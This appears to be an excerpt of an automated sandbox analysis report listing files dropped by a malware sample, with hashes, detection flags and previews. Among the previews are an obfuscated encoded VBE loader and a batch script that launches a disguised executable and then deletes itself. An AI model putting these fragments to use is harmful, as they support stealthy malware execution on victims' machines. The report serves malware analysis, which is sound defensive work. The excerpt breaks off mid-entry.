SSDEEP:	3:cCUa+2/zdIdRpQcc+TEYntgCUgu/GfS2RWN12SwcxdWoi4MCBSn:hIsOpQcc+zetguOTRW32LTo1MCBS
MD5:	75881A25EF8E73E8996FA52B9687BA38
SHA1:	61CA47188438DF62ECDA69101CF5EAD113343446
SHA-256:	CFD8445D078FE5542777C0264D269DB58BAB7081974D18317F8F91C4A5EC91A7
SHA-512:	09D372411B90C5B54801594D592E28115F8733567FB91C363D8BA66077D43586F4E3ED72C72B3EF826E2F12B3B893AE43A172AA46DD0274E0FFD69E8132E761C
Malicious:	false
Preview:	SHVjJMz59X6yJgarxHK3X1YTmD9wDzExEqL59wJRkvsfWnBTNIdh4CtbsB7FMC2KTJtcVfrB73TmI379Bpj5Vg2C7uM7yEEi3hMM3i8sacjAtGSzE8Dgd7

C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Joe Sandbox View:	Filename: PMDfwr7Jal.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\31997539b722e54a2a7374467bac21ada08fa869

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	208
Entropy (8bit):	5.791967439745721
Encrypted:	false
SSDEEP:	6:WN+wRhAY9ivFdfhfIgHgA0giAkqI5KHylshQ1ZoBrIR:vwHAdhQBAtifTlMQ/6rIR
MD5:	06A8B96BD68C0AB8514DA9E7F9053E25
SHA1:	F856D3B1270A302A6FC7FCC3BCE463686DCF0DA3
SHA-256:	E4A3234FE74529D86650CAEADFD33A418849983EB1A7603ECEE8E44F216D37B7
SHA-512:	B375CCA8626D5E172B30D790B50C5DC887CDBAEA4EF6C2EA5869E94EF1960385443D8F98ED8BD206A811E1CF09CBB9CEC4E66B82B341336C9F4BDD49302D2F9F
Malicious:	false
Preview:	YbvIClwBzAk5k0PagUCCDpOFpgzz8PRo5Mrp79mN1o7xKCjsxZufDzJsMqcgv7Cks6AYIkdgszKYsb5m6HCjewkFD9cRhGb4mXENCLkN6OxOou9vu0jn5dF6W4UJHL9lXQwVXrjuhynP9VbS9rgqgy9JRI1I1aFuPL1Y8nYCQzGGzz7AdBJaoTEiRnEO0b3Gt2AxeCUWTdZrr2Tb

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

Download File

Process:	C:\Windows\System32\WWanAPI\dwm.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.380493107040482
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5:	EC75759911B88E93A2B5947380336033
SHA1:	4D1472BBA520DBF76449567159CD927E94454210
SHA-256:	5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512:	EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

Download File

Process:	C:\Windows\hh\explorer.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.380493107040482
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5:	EC75759911B88E93A2B5947380336033
SHA1:	4D1472BBA520DBF76449567159CD927E94454210
SHA-256:	5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512:	EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jOMfQSwRhTi.exe.log

Download File

Process:	C:\Recovery\jOMfQSwRhTi.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.380493107040482
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5:	EC75759911B88E93A2B5947380336033
SHA1:	4D1472BBA520DBF76449567159CD927E94454210
SHA-256:	5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512:	EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\perfCrtmonitorsvcMonitorDll.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	5.37489905566343
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/elStHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6o9Zp/elStzHeqKkh2
MD5:	40B0737D9E519BE2FAE92D41EE16B42F
SHA1:	57A1EE0799583C2FDFE12AB3721B872A7B669D97
SHA-256:	3F0A9499BDFBC87F5AE57306FFEEEA7388214D9AD47CB12050A54F7DC64E7625
SHA-512:	EF059C601229B4A945A5A29A69802D733A525761B3FDA029D2E9B486F400DA2105A0EA88D0F02A90AED1BA1A2335CB5A122B28A93BF54B6C3D8C6FFE4066B28B
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	199
Entropy (8bit):	5.093645179366739
Encrypted:	false
SSDEEP:	6:hITg3Nou11r+DEiaS5fCnLDZKOZG1qLTwi23fRc:OTg9YDE0fWzwZ5c
MD5:	896F28316F3AFE4F2D693663DEB8DD9D
SHA1:	7B1DF53E912A77C1E96640CCBB2700883CC5C328
SHA-256:	E8ACE605031E61CC78692A9E3530C1CE85356FE7EAB23B807FACE432CF6197E2
SHA-512:	0D521356E855AF1AC892C24A4DB3615F024E8A4B0AD48C34C243B3B933A4B83471A5061DCAD52B92C0D15A03A6F517CA5636ED555B0CFF9F3748F9432D3B38B5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\ShellNew\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat"

C:\Users\user\AppData\Local\Temp\GjKBlYoEBb

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:wXgYWJvp:wXgJvp
MD5:	8AADEC3D82B8F426419D208A76EE9104
SHA1:	7A70889D60C6C3A58201F72E41A428C8714CDC69
SHA-256:	73EB65C8C4BD326279F0694C9BC760617A84F09D3C86D9C18823CCA3A13D7D8C
SHA-512:	88807B2714FA7CF4BAAAF8DA516FD387A40271644B83A028C61316E68DA94D09948032B278558891A1BC231274124BCD0CDFDFF964FE14243DFDC8BC584787ED
Malicious:	false
Preview:	QljpIsfQER5TrftI4ZM6F4TLL

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_442.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	58
Entropy (8bit):	4.21315185001968
Encrypted:	false
SSDEEP:	3:5IW7KRMRtKRMAQFV:5IW7xRtxTFV
MD5:	7C719C66000B0A22A451C0E4D3CDEBF7
SHA1:	6ED1082FFD2F07F82B0BAC5753CD8E1BF3E12096
SHA-256:	711C9F3EA1CEF74CF02FE1C4D98063A5D436F47DB265491DDC4ACFB48953FDD1
SHA-512:	97CB02F8DEF90E31BB094C14882F818033DC98E9297A0D5F8AD158EE1FEDE3608C13AE5B9E18D6A1F72F24450371593AA3D53F4A8E47DD555A1CF36D65997808
Malicious:	false
Preview:	"%Temp%\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_442.exe
File Type:	data
Category:	dropped
Size (bytes):	209
Entropy (8bit):	5.805951130489528
Encrypted:	false
SSDEEP:	6:GxWvwqK+NkLzWbH9WF08nZNDd3RL1wQJRQh9kX1a0N:GxFMCzWL74d3XBJswN
MD5:	B5ED2F061CF45FFD03BF99D750ACE127
SHA1:	23C74C327A8F47715534AF018463EAAF82F4BA2A
SHA-256:	73755D7F9485EBA68D61877C9D61950324C6D38EB0ED5005ED06DD0EFDAA6A35
SHA-512:	A5C4577F60BE3CF693F9C8904B632E2B25ADF9696BA38CAA68DC7F4FD47FA9C89DEE3AFE5656B6ECF9148A1EC4FF3BB09CE054B4EAFACB4FE709EA61EFC78419
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uza+D6ZMO:KxrYKDd-1z9TfLR\|2z5frc4mYE~~TBPWl^d+czoAAA==^#~@.

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_442.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: PMDfwr7Jal.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\jOMfQSwRhTi.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Joe Sandbox View:	Filename: PMDfwr7Jal.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ShellNew\WinStore.App.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ShellNew\fd168b19609dff09898eecd88986acb731eb6ff4

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (600), with no line terminators
Category:	dropped
Size (bytes):	600
Entropy (8bit):	5.838214579505065
Encrypted:	false
SSDEEP:	12:QZYnu+Q4lnl0MT9/voJUkqrmalDSYa9WBE:2Yu+rrvT9vsRa55DBE
MD5:	70B3503B1511147A9387A17A2DF61D31
SHA1:	8F6A08A44AED878547C6D6D0ED834C49A1ED1AD1
SHA-256:	AA936887DBD509F2948BEB1523F65BBE20AAC9CD56546F50F4F27300BFCE68FE
SHA-512:	E97916D0076312E946B1920FFB6B34F051BD212DBD95690858173C178840FF96D95B8517808B364063842B2B53123F5F57FC92B61A80D57955A8B10A5DBE88D9
Malicious:	false
Preview:	ruFdr1e371T0bW30AhF5tZ5MDYYqQpL7XrIT2kzlc4yZXoI70V3Rqx1Rz3ZTcxnRpVduNk7ZsddykfyYPa04w3Rk01e8LgJoRhuCLYtQYdjNTCqTFAEB7tfvE24VF8OLTyhDvwN0rkgSUEQxLK3KcHriC88SdXKZPX3ffmiTxNUXNMb9mHK5FEtMH8Bxx4WTZGD6LvSilkXPwTVzg8qWNOTLoqXglvf30B7GIfy0ymTfreZxnLQzNAGLw2ReYv70EdYvWOqAKzhk4yeKQj3Zeqp05wTQNTcDpdaNFobYfQoYcfQ8YHOy2hWYyizk5ax1Xe5bXRElIe4OBRXZfV1GEoKHGCYgy1dEcxA7kykHCmpYnIXhKaEjjqwsUxUV2hxRA0vOQayqvtEc8wd8p0WYw4ewASmxeOOezYXxWJRulXxzmUuiTWqBLYeGV9N8xBMgfjmjYqlfjmwYGpJpiEdHiMSa3RbX5T6jLQUCsKJnvKcjlG9qzhZsiE8SQLqHONkQpNNzUG7X50WXutzwRvhX3NBGSCvgdBYhkM4Y3JVskBxsskhhW30dpMWbLGhSUa44bzxiza3HZyx1aTXreOKkK51X

C:\Windows\System32\WWanAPI\6cb0b6c459d5d3455a3da700e713f2e2529862ff

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (562), with no line terminators
Category:	dropped
Size (bytes):	562
Entropy (8bit):	5.869141806967595
Encrypted:	false
SSDEEP:	12:WQqDDSW2XDcPbRcv5TuDONx0s80ql0arCtouN/59rxy8j/QwpeKF:WQeyDcPbKMDONx0x0quV6uNvxFswwKF
MD5:	78CF722DAE111B243000C0CB949420ED
SHA1:	D7D97890A94F481040B1A9AB41BDBC724C7C3E9E
SHA-256:	16CBD779774318A3995A7094F48580267878EEF0AC2FEAEF476CB5E3D8DA4A16
SHA-512:	8E7415B2A2A2C2447F0FEEF2C388FFFCCED09D328A8DD517C0E33F479EED2216A4DC49130641CF1E730E69433BFD8BA63C637BABEA68942FE77064C158CD1A45
Malicious:	false
Preview:	FECN1gRa4uZePcbazkFCU9tlxpltA24SkZa1oxueB08SMDLMy6b8k7OGVaZL4haC0H3zCkvC0lAdAaZteZ4Ea5rnLTfOYijea5cEKVKOKZI86uG5BprfmWm5ZPosEhnRBgDE8UjJPq3BwsqbMkMs1E1DThp4qbKnv07arC7qGhQ6ckIqiNgdU5Z7p9uappcxgQQ6vQuKnflTy4ktZ8Vd5qSza9vrSgBbFcaMUM4SdVzyTGJuYBBqT82z7afweC2HeKOWeYYMDCAj0dfU0BTQeUIGkkO4qIyadsUJ2xPAmymQ8S9e4K5dtlnJCHv4Jeg5OjGIJWcDvTopr1IRku9gMVr1EKHvBV0HSrBYL0Vir1rZ68bK8dTZf9s32OE8OrCacgWAzuGuZbyVnR5Gs6whBbmT9If7wWTAzR7ZlbVOXjADKXPkT7PS4eYB4CBqOJ7CHyfWUfeRliKcbiIl25nzGBFU25fiao9Ol76W13Qyc8qWU6kV4ZyTfI5FsKeY9506i50dmwt9ozWIUtA5VJoA0qtcC0orY2ygHuxZFGtIpyopwxu8Ki

C:\Windows\System32\WWanAPI\dwm.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\hh\7a0fd90576e08807bde2cc57bcf9854bbce05fe3

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (893), with no line terminators
Category:	dropped
Size (bytes):	893
Entropy (8bit):	5.9097465218688265
Encrypted:	false
SSDEEP:	24:aFq59yUUjsKJMPOBRKeoX+RBNmwHzkHuy:sOosKJrwUHHza
MD5:	ECC3A3F49E9DEB883DC334936376B69F
SHA1:	53DA7309F762EBE2AE1DC3ABA27BE3B633531CDC
SHA-256:	F1B83D4D031C292B4C2B590ED613188855DE534ABC26BE26B58E15FA2C6AC21A
SHA-512:	DBB2DA9D9254E3A3C529A79D3F8FF446A46508B09BCAE044C38E0EE85200077A28673FFEA87F59216D5873CE9B92D70DB05F36ADE7868A4426F68A4BFE273A59
Malicious:	false
Preview:	x9s69tD0ZfA2s0xGQUtg7ZtWNGeVanthCe4efOkb1A8TbUDwPR3xJt5XQVs3OrZvvd0O5SlCtRo6bZ53CsFJu6XSigOJfqNJlNh8ez06p1D2E960az0flQBzFhpYEcgCEfVO17ZN1Je22fNjkXsq0rhULs26Kb2NUAxjnr9dZnocwI6jTGyqt0MX7ACJEcCaQQi1ro52YPQMDEiDvTnEnLdeyamnp0Z7kOMfkF2pK5Sej9U2b9Xvy8wEwDCQBSNizTmy2Ddqa83r394zGuLqcoIlbHtgCln2stoQWf9YgqU0FELxINKQGgFLKAXvU6ozUB9KUocluxKvTSgW65XybXvLncFWHOEjCefDFAcevifTWT12eByYizY7Pxg1jGegtktzwcQ5d3D21czTlM1GZpANFiySek5pE9jwkCGCu34pwgGx8MQWOXGDjgtOo8b28Yy12CtiGyWguVbjbATRTiar3gMES1YvbBqXsO45dsPaBjSNEKwnoJja8G8WzoPPakFtpD1NFXxlS9pTN99IEuGRcQZlPiFzcA9aejiBSjhQW7H8bpJ0oGKpdxQYnQ7hR7JRAPzna8zeM05fJbKkYPKV0T7rTKXCmA8Yyz7LzgZqQpdn1uPMFWICwxbqRHTQlx2M1grTd8u2zeEK0Tzi5K6Q26lAYR4sMJEdxRwVD5sHlPNSsQ08RuVa0mU44q4MECqpZkXjhef9bzomtTRHa5abyonL71aWAgDijh2H2QbxPV8B7rLlZxvImO1v7MmpEI85vGCLbJOJemLcqmNPpz7Nu56UpHKqovtGWCP0o9JPiln9DYEU8X9OLvK0KsgU9ift3FGnWWkqprpJR6RRCzrRve5l1Zq6dzQ9G4F8Sb8lxTjdFBiNbOSJ0N7ZJ

C:\Windows\hh\explorer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.832626528384455
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX7zRLtRvoP6X6vj:Vx993DEU6RLtGP88
MD5:	CBBCB86FC483F44C51A7DA66673F76F7
SHA1:	DA667CEEF41B1048DAD23BAA3B1A487C7916C219
